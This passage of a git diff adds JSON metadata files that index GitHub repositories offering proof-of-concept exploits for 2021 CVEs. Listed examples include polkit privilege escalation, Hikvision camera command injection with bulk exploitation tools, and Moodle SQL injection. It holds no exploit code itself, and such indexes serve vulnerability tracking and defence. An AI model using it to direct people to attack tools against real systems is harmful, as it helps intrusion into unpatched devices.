"polkit", + "proof-of-concept", + "python", + "unicord", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 664478569, + "name": "CVE-2021-3560", + "full_name": "asepsaepdin\/CVE-2021-3560", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-3560", + "description": null, + "fork": false, + "created_at": "2023-07-10T04:26:13Z", + "updated_at": "2023-07-10T04:29:22Z", + "pushed_at": "2023-09-05T14:48:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 680828510, + "name": "ROOT-CVE-2021-3560", + "full_name": "pashayogi\/ROOT-CVE-2021-3560", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/ROOT-CVE-2021-3560", + "description": "Polkit 0.105-26 0.117-2 - Local Privilege Escalation", + "fork": false, + "created_at": "2023-08-20T14:39:19Z", + "updated_at": "2023-08-20T14:39:43Z", + "pushed_at": "2023-08-20T14:39:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 701416179, + "name": "CVE-2021-3560", + "full_name": "TieuLong21Prosper\/CVE-2021-3560", + "owner": { + "login": "TieuLong21Prosper", + "id": 128500598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128500598?v=4", + "html_url": "https:\/\/github.com\/TieuLong21Prosper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TieuLong21Prosper\/CVE-2021-3560", + "description": "CVE-2021-3560 Bypass su - root", + "fork": false, + "created_at": "2023-10-06T15:27:13Z", + "updated_at": "2023-10-06T15:34:33Z", + "pushed_at": "2023-10-10T18:46:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 715920193, + "name": "CVE-2021-3560", + "full_name": "LucasPDiniz\/CVE-2021-3560", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2021-3560", + "description": "Exploitation of the CVE-2021-3560 polkit vulnerability", + "fork": false, + "created_at": "2023-11-08T05:11:56Z", + "updated_at": "2024-06-30T22:01:58Z", + "pushed_at": "2024-06-30T22:01:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-3560", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 731859599, + "name": "CVE-2021-3560-Polkit-Privilege-Escalation", + "full_name": "markyu0401\/CVE-2021-3560-Polkit-Privilege-Escalation", + "owner": { + "login": "markyu0401", + "id": 60618569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60618569?v=4", + "html_url": "https:\/\/github.com\/markyu0401", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markyu0401\/CVE-2021-3560-Polkit-Privilege-Escalation", + "description": null, + "fork": false, + "created_at": "2023-12-15T03:38:41Z", + "updated_at": "2024-02-24T04:41:27Z", + "pushed_at": "2024-02-24T05:01:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776748749, + "name": "CVE-2021-3560-EXPLOIT", + "full_name": "Kyyomaa\/CVE-2021-3560-EXPLOIT", + "owner": { + "login": "Kyyomaa", + "id": 123502260, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123502260?v=4", + "html_url": "https:\/\/github.com\/Kyyomaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kyyomaa\/CVE-2021-3560-EXPLOIT", + "description": "Part of my cybersecurity thesis consists in exploring and exploiting this vulnerability.", + "fork": false, + "created_at": "2024-03-24T11:37:18Z", + "updated_at": "2024-06-16T12:24:02Z", + "pushed_at": "2024-04-23T11:02:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35616.json b/2021/CVE-2021-35616.json new file mode 100644 index 0000000000..d1d65cd7eb --- /dev/null +++ b/2021/CVE-2021-35616.json @@ -0,0 +1,33 @@ +[ + { + "id": 434604239, + "name": "OracleOTM", + "full_name": "Ofirhamam\/OracleOTM", + "owner": { + "login": "Ofirhamam", + "id": 71285065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71285065?v=4", + "html_url": "https:\/\/github.com\/Ofirhamam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ofirhamam\/OracleOTM", + "description": "Python tool for exploiting CVE-2021-35616 ", + "fork": false, + "created_at": "2021-12-03T13:22:19Z", + "updated_at": "2022-12-06T09:43:34Z", + "pushed_at": "2021-12-03T14:00:10Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3572.json b/2021/CVE-2021-3572.json new file mode 100644 index 0000000000..a35b268a81 --- /dev/null +++ b/2021/CVE-2021-3572.json @@ -0,0 +1,33 @@ +[ + { + "id": 374593523, + "name": "CVE-2021-3572", + "full_name": "frenzymadness\/CVE-2021-3572", + "owner": { + "login": "frenzymadness", + "id": 5688939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5688939?v=4", + "html_url": "https:\/\/github.com\/frenzymadness", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/frenzymadness\/CVE-2021-3572", + "description": "A simple repository helping to test CVE-2021-3572 in PyPA\/pip", + "fork": false, + "created_at": "2021-06-07T08:36:47Z", + "updated_at": "2024-07-05T12:10:26Z", + "pushed_at": "2021-06-07T09:04:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35956.json b/2021/CVE-2021-35956.json new file mode 100644 index 0000000000..06c8f6a4d5 --- /dev/null +++ b/2021/CVE-2021-35956.json @@ -0,0 +1,40 @@ +[ + { + "id": 382029870, + "name": "CVE-2021-35956", + "full_name": "tcbutler320\/CVE-2021-35956", + "owner": { + "login": "tcbutler320", + "id": 41709108, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709108?v=4", + "html_url": "https:\/\/github.com\/tcbutler320", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tcbutler320\/CVE-2021-35956", + "description": "Proof of Concept Exploit for CVE-2021-35956, AKCP sensorProbe - 'Multiple' Cross Site Scripting (XSS)", + "fork": false, + "created_at": "2021-07-01T12:44:05Z", + "updated_at": "2021-07-02T03:55:56Z", + "pushed_at": "2021-07-01T12:46:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-35956", + "exploit", + "exploit-code", + "exploit-db", + "proof-of-concept" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35958.json b/2021/CVE-2021-35958.json new file mode 100644 index 0000000000..8e29dc2af5 --- /dev/null +++ b/2021/CVE-2021-35958.json @@ -0,0 +1,64 @@ +[ + { + "id": 786354596, + "name": "CVE-2021-35958-2", + "full_name": "miguelc49\/CVE-2021-35958-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-35958-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:44Z", + "updated_at": "2024-04-14T17:38:46Z", + "pushed_at": "2024-04-14T17:38:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354604, + "name": "CVE-2021-35958-1", + "full_name": "miguelc49\/CVE-2021-35958-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-35958-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:47Z", + "updated_at": "2024-04-14T17:38:42Z", + "pushed_at": "2024-04-14T17:38:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35975.json b/2021/CVE-2021-35975.json new file mode 100644 index 0000000000..4fa9a9d109 --- /dev/null +++ b/2021/CVE-2021-35975.json @@ -0,0 +1,33 @@ +[ + { + "id": 719948197, + "name": "CVE-2021-35975", + "full_name": "fbkcs\/CVE-2021-35975", + "owner": { + "login": "fbkcs", + "id": 44971422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44971422?v=4", + "html_url": "https:\/\/github.com\/fbkcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fbkcs\/CVE-2021-35975", + "description": "Path Traversal Vulnerability in Systematica SMTP Adapter and other sub-products", + "fork": false, + "created_at": "2023-11-17T08:47:20Z", + "updated_at": "2023-11-17T08:47:21Z", + "pushed_at": "2023-11-17T09:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3625.json b/2021/CVE-2021-3625.json new file mode 100644 index 0000000000..0ac583f316 --- /dev/null +++ b/2021/CVE-2021-3625.json @@ -0,0 +1,37 @@ +[ + { + "id": 414209100, + "name": "zephyr_cve-2021-3625", + "full_name": "szymonh\/zephyr_cve-2021-3625", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/zephyr_cve-2021-3625", + "description": "CVE-2021-3625 - Sample exploits for Zephyr", + "fork": false, + "created_at": "2021-10-06T12:47:24Z", + "updated_at": "2022-11-10T12:01:06Z", + "pushed_at": "2021-10-07T08:51:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "security", + "vulnerability", + "zephyr" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36260.json b/2021/CVE-2021-36260.json new file mode 100644 index 0000000000..f36059dfad --- /dev/null +++ b/2021/CVE-2021-36260.json @@ -0,0 +1,284 @@ +[ + { + "id": 418375861, + "name": "CVE-2021-36260", + "full_name": "rabbitsafe\/CVE-2021-36260", + "owner": { + "login": "rabbitsafe", + "id": 33046073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046073?v=4", + "html_url": "https:\/\/github.com\/rabbitsafe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rabbitsafe\/CVE-2021-36260", + "description": "CVE-2021-36260", + "fork": false, + "created_at": "2021-10-18T06:40:48Z", + "updated_at": "2024-10-03T10:45:48Z", + "pushed_at": "2023-10-27T02:20:32Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421880973, + "name": "CVE-2021-36260", + "full_name": "Aiminsun\/CVE-2021-36260", + "owner": { + "login": "Aiminsun", + "id": 58260225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58260225?v=4", + "html_url": "https:\/\/github.com\/Aiminsun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aiminsun\/CVE-2021-36260", + "description": "command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.", + "fork": false, + "created_at": "2021-10-27T15:51:12Z", + "updated_at": "2024-11-24T15:49:42Z", + "pushed_at": "2021-10-28T06:37:37Z", + "stargazers_count": 255, + "watchers_count": 255, + "has_discussions": false, + "forks_count": 76, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 76, + "watchers": 255, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 424140037, + "name": "CVE-2021-36260-metasploit", + "full_name": "TaroballzChen\/CVE-2021-36260-metasploit", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-36260-metasploit", + "description": "the metasploit script(POC) about CVE-2021-36260 ", + "fork": false, + "created_at": "2021-11-03T08:11:49Z", + "updated_at": "2024-08-12T20:17:46Z", + "pushed_at": "2021-11-03T08:26:24Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437809411, + "name": "CheckHKRCE", + "full_name": "tuntin9x\/CheckHKRCE", + "owner": { + "login": "tuntin9x", + "id": 42837549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42837549?v=4", + "html_url": "https:\/\/github.com\/tuntin9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuntin9x\/CheckHKRCE", + "description": "CVE-2021-36260", + "fork": false, + "created_at": "2021-12-13T09:23:36Z", + "updated_at": "2024-08-13T14:54:28Z", + "pushed_at": "2022-10-27T01:14:34Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520972929, + "name": "CVE-2021-36260", + "full_name": "Cuerz\/CVE-2021-36260", + "owner": { + "login": "Cuerz", + "id": 84277976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84277976?v=4", + "html_url": "https:\/\/github.com\/Cuerz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cuerz\/CVE-2021-36260", + "description": "海康威视RCE漏洞 批量检测和利用工具", + "fork": false, + "created_at": "2022-08-03T17:27:59Z", + "updated_at": "2024-11-06T23:16:25Z", + "pushed_at": "2022-08-05T19:57:30Z", + "stargazers_count": 143, + "watchers_count": 143, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-36260", + "exploit" + ], + "visibility": "public", + "forks": 24, + "watchers": 143, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 530277219, + "name": "Simple-CVE-2021-36260", + "full_name": "TakenoSite\/Simple-CVE-2021-36260", + "owner": { + "login": "TakenoSite", + "id": 84880497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84880497?v=4", + "html_url": "https:\/\/github.com\/TakenoSite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TakenoSite\/Simple-CVE-2021-36260", + "description": null, + "fork": false, + "created_at": "2022-08-29T15:21:11Z", + "updated_at": "2023-05-10T06:31:35Z", + "pushed_at": "2022-08-31T11:27:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667627206, + "name": "hikvision_brute", + "full_name": "r3t4k3r\/hikvision_brute", + "owner": { + "login": "r3t4k3r", + "id": 86055096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86055096?v=4", + "html_url": "https:\/\/github.com\/r3t4k3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3t4k3r\/hikvision_brute", + "description": "Brute Hikvision CAMS with CVE-2021-36260 Exploit", + "fork": false, + "created_at": "2023-07-18T00:31:47Z", + "updated_at": "2024-11-08T07:20:31Z", + "pushed_at": "2023-07-29T17:41:39Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708419065, + "name": "HIK-CVE-2021-36260-Exploit", + "full_name": "haingn\/HIK-CVE-2021-36260-Exploit", + "owner": { + "login": "haingn", + "id": 52133074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52133074?v=4", + "html_url": "https:\/\/github.com\/haingn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haingn\/HIK-CVE-2021-36260-Exploit", + "description": null, + "fork": false, + "created_at": "2023-10-22T14:09:18Z", + "updated_at": "2023-10-22T14:09:32Z", + "pushed_at": "2023-10-22T14:09:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894493486, + "name": "hikvision_probe", + "full_name": "aengussong\/hikvision_probe", + "owner": { + "login": "aengussong", + "id": 26045876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26045876?v=4", + "html_url": "https:\/\/github.com\/aengussong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aengussong\/hikvision_probe", + "description": "Identify hikvision ip and probe for cve-s (CVE-2017-7921, CVE-2022-28171, CVE-2021-36260)", + "fork": false, + "created_at": "2024-11-26T13:02:18Z", + "updated_at": "2024-11-26T13:23:21Z", + "pushed_at": "2024-11-26T13:21:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36393.json b/2021/CVE-2021-36393.json new file mode 100644 index 0000000000..a52447cf45 --- /dev/null +++ b/2021/CVE-2021-36393.json @@ -0,0 +1,38 @@ +[ + { + "id": 710897618, + "name": "CVE-2021-36393", + "full_name": "StackOverflowExcept1on\/CVE-2021-36393", + "owner": { + "login": "StackOverflowExcept1on", + "id": 109800286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109800286?v=4", + "html_url": "https:\/\/github.com\/StackOverflowExcept1on", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StackOverflowExcept1on\/CVE-2021-36393", + "description": "Error-based blind SQL injection with bit-shifting approach for Moodle 3.10.4", + "fork": false, + "created_at": "2023-10-27T17:13:55Z", + "updated_at": "2024-09-28T11:49:11Z", + "pushed_at": "2023-12-29T14:12:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "moodle", + "sql-injection", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36394.json b/2021/CVE-2021-36394.json new file mode 100644 index 0000000000..7a0e1e744d --- /dev/null +++ b/2021/CVE-2021-36394.json @@ -0,0 +1,64 @@ +[ + { + "id": 400700031, + "name": "CVE-2021-36394", + "full_name": "dinhbaouit\/CVE-2021-36394", + "owner": { + "login": "dinhbaouit", + "id": 17717385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17717385?v=4", + "html_url": "https:\/\/github.com\/dinhbaouit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinhbaouit\/CVE-2021-36394", + "description": null, + "fork": false, + "created_at": "2021-08-28T04:21:44Z", + "updated_at": "2024-02-05T05:21:30Z", + "pushed_at": "2021-08-29T14:06:28Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 485686630, + "name": "CVE-2021-36394-Pre-Auth-RCE-in-Moodle", + "full_name": "lavclash75\/CVE-2021-36394-Pre-Auth-RCE-in-Moodle", + "owner": { + "login": "lavclash75", + "id": 46343695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46343695?v=4", + "html_url": "https:\/\/github.com\/lavclash75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lavclash75\/CVE-2021-36394-Pre-Auth-RCE-in-Moodle", + "description": null, + "fork": false, + "created_at": "2022-04-26T07:52:24Z", + "updated_at": "2024-11-24T16:37:06Z", + "pushed_at": "2022-05-02T17:17:16Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36396.json b/2021/CVE-2021-36396.json new file mode 100644 index 0000000000..49cdc67cf3 --- /dev/null +++ b/2021/CVE-2021-36396.json @@ -0,0 +1,33 @@ +[ + { + "id": 714260511, + "name": "CVE-2021-36396-Exploit", + "full_name": "T0X1Cx\/CVE-2021-36396-Exploit", + "owner": { + "login": "T0X1Cx", + "id": 71453093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71453093?v=4", + "html_url": "https:\/\/github.com\/T0X1Cx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T0X1Cx\/CVE-2021-36396-Exploit", + "description": "This script demonstrates a time-based blind SQL injection on Moodle platforms, exploiting response delays to extract data.", + "fork": false, + "created_at": "2023-11-04T11:45:55Z", + "updated_at": "2024-10-25T10:30:06Z", + "pushed_at": "2024-07-07T18:39:45Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36460.json b/2021/CVE-2021-36460.json new file mode 100644 index 0000000000..61fa0423e1 --- /dev/null +++ b/2021/CVE-2021-36460.json @@ -0,0 +1,33 @@ +[ + { + "id": 484357238, + "name": "CVE-2021-36460", + "full_name": "martinfrancois\/CVE-2021-36460", + "owner": { + "login": "martinfrancois", + "id": 14319020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14319020?v=4", + "html_url": "https:\/\/github.com\/martinfrancois", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/martinfrancois\/CVE-2021-36460", + "description": null, + "fork": false, + "created_at": "2022-04-22T08:33:47Z", + "updated_at": "2022-04-22T08:33:47Z", + "pushed_at": "2022-04-22T08:34:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3656.json b/2021/CVE-2021-3656.json new file mode 100644 index 0000000000..de051096c2 --- /dev/null +++ b/2021/CVE-2021-3656.json @@ -0,0 +1,33 @@ +[ + { + "id": 562227251, + "name": "CVE-2021-3656-Demo", + "full_name": "rami08448\/CVE-2021-3656-Demo", + "owner": { + "login": "rami08448", + "id": 77466752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77466752?v=4", + "html_url": "https:\/\/github.com\/rami08448", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rami08448\/CVE-2021-3656-Demo", + "description": null, + "fork": false, + "created_at": "2022-11-05T17:32:47Z", + "updated_at": "2023-03-20T20:09:22Z", + "pushed_at": "2022-11-22T03:03:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36563.json b/2021/CVE-2021-36563.json new file mode 100644 index 0000000000..223545e051 --- /dev/null +++ b/2021/CVE-2021-36563.json @@ -0,0 +1,33 @@ +[ + { + "id": 389955098, + "name": "CVE-2021-36563", + "full_name": "Edgarloyola\/CVE-2021-36563", + "owner": { + "login": "Edgarloyola", + "id": 43635073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4", + "html_url": "https:\/\/github.com\/Edgarloyola", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-36563", + "description": null, + "fork": false, + "created_at": "2021-07-27T11:22:21Z", + "updated_at": "2024-05-21T15:43:55Z", + "pushed_at": "2022-09-16T17:53:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36593.json b/2021/CVE-2021-36593.json new file mode 100644 index 0000000000..40c8e2bf7d --- /dev/null +++ b/2021/CVE-2021-36593.json @@ -0,0 +1,33 @@ +[ + { + "id": 794884984, + "name": "Statement", + "full_name": "mir-hossein\/Statement", + "owner": { + "login": "mir-hossein", + "id": 71374198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71374198?v=4", + "html_url": "https:\/\/github.com\/mir-hossein", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mir-hossein\/Statement", + "description": "About CVE-2021-36593 and CVE-2021-36594", + "fork": false, + "created_at": "2024-05-02T06:41:14Z", + "updated_at": "2024-05-02T06:43:37Z", + "pushed_at": "2024-05-02T06:42:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36630.json b/2021/CVE-2021-36630.json new file mode 100644 index 0000000000..dd4ed66cc8 --- /dev/null +++ b/2021/CVE-2021-36630.json @@ -0,0 +1,33 @@ +[ + { + "id": 589168903, + "name": "CVE-2021-36630", + "full_name": "lixiang957\/CVE-2021-36630", + "owner": { + "login": "lixiang957", + "id": 34414625, + "avatar_url": 